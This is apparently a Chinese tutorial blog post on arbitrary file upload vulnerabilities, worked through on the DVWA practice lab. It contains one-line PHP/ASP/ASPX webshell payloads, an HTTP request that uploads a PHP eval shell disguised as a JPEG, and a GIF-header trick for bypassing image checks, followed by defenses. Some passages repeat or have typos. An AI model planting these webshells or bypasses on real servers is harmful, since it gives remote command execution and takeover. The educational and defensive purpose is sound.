文件上传是Wb应用必备功能之一,如,头像上传,附件分享等。如果服务器配置不当或者没有进行足够的过滤,Web用户就可以上传任意文件,包括恶意脚本文件,exe程序等等,这就造成了任意文件上传漏洞。
服务器配置不当,开启了PUT方法。
Web应用开放了文件上传功能,没有对上传的文件做足够的限制和过滤。
在程序开发部署时,没有考虑以下因素,导致限制被绕过:
任意文件上传漏洞的原理通常由以下几点组成:
任意文件上传漏洞的危害包括但不限于以下几点:
通过文件上传漏洞获得的网站后门,叫WebShell。
攻击者可以通过以下方式利用任意文件上传漏洞:
要验证任意文件上传漏洞,可以按照以下步骤进行:
Windows | Linux |
---|---|
powershell | bash |
cmd | sh |
zsh | |
… |
WebShel‖是一个网站的后门,也是一个命令解释器。通过Web方式,使用HTTP HTTPS协议传递命令消息到服务器,并且继承了Web用户的权限,在服务器上远程执行命令。WebShell从本质上讲,就是服务器端可运行的脚本文件,后缀名通常为:
WebShell接收来自于Web用户的命令,然后在服务器端执行,也称为网站木马、木马后门、网马等。
Web 容器 | 脚本语言 |
---|---|
Apache HTTPD | php |
IIS | asp| aspx| php |
Tomcat | jsp| jspx |
代码量比较大,与小马对比。
一句话木马,需要与中国菜闭配合。
特点:短小精悍,功能强大。
三大基本功能:文件管理、虚拟终端、数据库管理。
php脚本格式:
@eval($_REQUEST[777])?>
//代码执行函数+传参点
asp脚本形式:
<%eval request("777")%>
aspx脚本形式:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["777"],"unsafe");%>
GetShell是获取WebShell的过程或结果。文件上传漏洞的利用是GetShell的主要方式,但不是唯一手段。
tennc/webshell 。
以DVWA靶场为例,可以参考俺的另一篇博客:DVWA靶场通关详细教程
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo 'Your image was not uploaded.
'; }
else {
// Yes!
echo "{$target_path} succesfully uploaded!
"; }
}
?>
将上传的文件存入缓存中,然后移动到目标路径
对文件上传没有做任何过滤。
任意文件上传。
黑白名单是最常用,也是最重要的安全策略之一。黑白名单策略类似于一个列表,列表中写了一些条件或者规则,黑名单就是非法条件,白名单就是合法条件,类似于手机的黑白名单。也是最常用的防御策略之一。
文件后缀名
文件类型
文件内容
$deny_ext = array( ".php",".php5",".php4",".php3",".php2","php1",".phtml",".pht", ".html",".htm", ".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jhtml", ".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx", ".cer",".swf",
".htaccess" );
$allow_ext = array(
'jpg','jpeg','png',
'bmp','gif','svg',
'zip','tar.gz', 'doc',
'docx','pdf','xls','ppt'
);
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo 'Your image was not uploaded.
'; }
else {
// Yes!
echo "{$target_path} succesfully uploaded!
"; }
}
else {
// Invalid file
echo 'Your image was not uploaded. We can only accept JPEG or PNG images.
'; }
}
?>
上传的文件没有重命名。
Content-Type 类型白名单检测。
任意文件上传。
POST /dvwa_2.0.1/vulnerabilities/upload/ HTTP/1.1
Host: 10.4.7.196
Content-Length: 432
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.4.7.196
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3xRrwk8liSH6rVVn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/sig ned-exchange;v=b3;q=0.9
Referer: http://10.4.7.196/dvwa_2.0.1/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security=medium; PHPSESSID=rkgc97fga9q51hn8vciv5dt5e7; ASPSESSIONIDSASCAARA=DPNHBLIBFBKFLHLNLEHPMJCH; ASPXSpy=5854b7d51176229708197a5334ba1195
Connection: close
------WebKitFormBoundary3xRrwk8liSH6rVVn
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundary3xRrwk8liSH6rVVn
Content-Disposition: form-data; name="uploaded"; filename="yjh.php" Content-Type: image/jpeg
<?php @eval($_REQUEST[777]);phpinfo(); ?>
------WebKitFormBoundary3xRrwk8liSH6rVVn Content-Disposition: form-data; name="Upload"
Upload
------WebKitFormBoundary3xRrwk8liSH6rVVn--
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower(
$uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo 'Your image was not uploaded.
'; }
else {
// Yes!
echo "{$target_path} succesfully uploaded!
"; }
}
else {
// Invalid file
echo 'Your image was not uploaded. We can only accept JPEG or PNG images.
'; }
}
?>
上传文件没有重命名;
文件后缀名白名单检测;
使用getimagesize() 进行文件内容检测,只检测文件头部。
文件幻数
getimagesize()函数判断一个文件是否是图片的时候,采用的是文件幻术。
所有的GIF文件都是47 49 46 开头的。
解决方法:文件内容的绕过
在文件上方添加GIF80a
copy imgName/b+yjh/a newImgName
说明:
if( isset( $_POST[ 'Upload' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
//$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
$target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
$temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
$temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
// Is it an image?
if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower(
$uploaded_ext ) == 'png' ) &&
( $uploaded_size < 100000 ) &&
( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
getimagesize( $uploaded_tmp ) ) {
// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) if( $uploaded_type == 'image/jpeg' ) {
$img = imagecreatefromjpeg( $uploaded_tmp ); imagejpeg( $img, $temp_file, 100);
}
else {
$img = imagecreatefrompng( $uploaded_tmp ); imagepng( $img, $temp_file, 9);
}
imagedestroy( $img );
// Can we move the file to the web root from the temp folder?
if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
// Yes!
echo "${target_file} succesfully uploaded!
"; }
else {
// No
echo 'Your image was not uploaded.
'; }
// Delete any temp files
if( file_exists( $temp_file ) ) unlink( $temp_file );
}
else {
// Invalid file
echo 'Your image was not uploaded. We can only accept JPEG or PNG images.
'; }
}
// Generate Anti-CSRF token generateSessionToken();
?>
imagecreatefromjpeg():由文件或URL创建一个图像。(可以过滤图片中的一句话木马)
文件上传漏洞完美利用,受到以下条件限制:
Web 服务器开启文件上传功能,Web 用户可以使用该功能。
Web 用户({www|www-data|apache})对目标目录具有可写权限,甚至具有执行权限。一般情况下,Web 目录都有执行权限。
完美利用意味着文件可以执行,也就是说代码可以被服务器解析。
服务器开启了PUT 方法。
采用白名单策略,严格限制上传文件的后缀名。
上传文件重命名,尽量少的从客户端获取信息,包括文件名、文件类型、文件内容等。
文件内容检测。
进行二次渲染,过滤掉图片马中的恶意代码。
避免文件包含漏洞。
严格处理文件路径,防御00 截断漏洞。
检测Token 值,防止数据包重放。
避开空格、点 .
、 ::$DATA
等系统特性。
行权限。一般情况下,Web 目录都有执行权限。
完美利用意味着文件可以执行,也就是说代码可以被服务器解析。
服务器开启了PUT 方法。
采用白名单策略,严格限制上传文件的后缀名。
上传文件重命名,尽量少的从客户端获取信息,包括文件名、文件类型、文件内容等。
文件内容检测。
进行二次渲染,过滤掉图片马中的恶意代码。
避免文件包含漏洞。
严格处理文件路径,防御00 截断漏洞。
检测Token 值,防止数据包重放。
避开空格、点 .
、 ::$DATA
等系统特性。
严格控制权限,执行权限与写权限分离。
建立单独的文件存储服务器,类似于站库分离。